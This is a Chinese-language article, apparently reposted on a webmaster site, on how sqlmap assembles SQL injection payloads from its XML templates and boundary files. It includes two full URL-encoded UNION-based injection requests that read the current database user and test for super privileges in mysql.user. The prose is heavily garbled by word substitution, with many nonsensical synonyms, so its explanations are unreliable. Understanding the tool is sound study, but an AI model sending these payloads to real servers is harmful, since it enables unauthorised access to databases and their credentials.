加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 建站 > 正文

聊一聊SQLMAP在举办SQL注入时的整个流程

发布时间:2019-07-05 20:54:25 所属栏目:建站 来源:sher10ck
导读:许多小搭档在发明可能判定出注入的时辰,大大都选择就是直接上sqlmap,功效每每也不尽人意,于是就有设法来写写 sqlmap 从执行到判定注入,到底产生了什么? 本文就用我们看的见的角度来说明,看看sqlmap到底发送了什么payload,这些payload是怎么出来的,

对付每种范例的注入语句必要怎样组合,在 sqlmap/data/xml/payloads 下有六个文件,内里首要是界说了测试的名称(也就是我们节制台中输出的内容)、风险品级、一些 payload 的位置等,相识一下就行了。

  1. <test> 
  2.         <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title> 
  3.         <stype>6</stype> 
  4.         <level>1</level> 
  5.         <risk>1</risk> 
  6.         <clause>1,2,3,4,5</clause> 
  7.         <where>1</where> 
  8.         <vector>[UNION]</vector> 
  9.         <request> 
  10.             <payload/> 
  11.             <comment>[GENERIC_SQL_COMMENT]</comment> 
  12.             <char>[CHAR]</char> 
  13.             <columns>[COLSTART]-[COLSTOP]</columns> 
  14.         </request> 
  15.         <response> 
  16.             <union/> 
  17.         </response> 
  18.     </test> 

同目次下尚有一个 boundaries.xml 文件,内里首要是界说了一些闭合的标记,例如说我们注入点必要闭合,添加单引号、双引号、括号等一系列的组合方法,就是从这个文件傍边提取出来的。

  1. <boundary> 
  2.        <level>3</level> 
  3.        <clause>1</clause> 
  4.        <where>1,2</where> 
  5.        <ptype>3</ptype> 
  6.        <prefix>'))</prefix> 
  7.        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix> 
  8.    </boundary> 

以是梳理一下思绪,我们最终会发送给方针处事器的 payload,起首是必要闭合的 (boundaries.xml),然后从对应的注入范例的各类测试模板中提取响应的参数(好比:boolean_blind.xml),然后在 queries.xml 中取出响应的表达式,最后通过 tamper 的渲染,输出我们最终的 payload,也就是我们的 -v3 参数。

sqlmap 的一些参数

我们首要说明以下两个呼吁:

  1. --is-dba 
  2. --passwords 

呼吁首要是判定 mysql 用户的一些信息,当我们发明注入可以操作的时辰,下一步就是要看当前用户的权限看能有什么的操纵了。

1. 判定是否是 dba 权限

sqlmap 一共发了两个哀求包:

  1. GET /xxxx.php?id=-2478%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280xxxxxxx%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x7176786b71%29%2CNULL%2CNULL--%20HZdP HTTP/1.1 
  2. Host: www.xxxx.xxx 
  3. Accept: */* 
  4. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  5. Connection: close 
  6. Cache-Control: no-cache 
  7.  
  8.  
  9. GET /xxxx.php?id=-6628%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7178787871%2C%28CASE%20WHEN%20%28%28SELECT%20super_priv%20FROM%20mysql.user%20WHERE%20user%3D0xxxxxxxx%20LIMIT%200%2C1%29%3D0x59%29%20THEN%201%20ELSE%200%20END%29%2C0x7170627071%29--%20mOPV HTTP/1.1 
  10. Host: www.xxxx.xxx 
  11. Accept: */* 
  12. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  13. Connection: close 
  14. Cache-Control: no-cache 

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读